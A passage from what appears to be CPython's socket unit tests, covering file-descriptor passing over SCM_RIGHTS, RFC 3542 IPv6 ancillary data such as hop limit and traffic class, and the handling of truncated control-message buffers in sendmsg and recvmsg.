[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
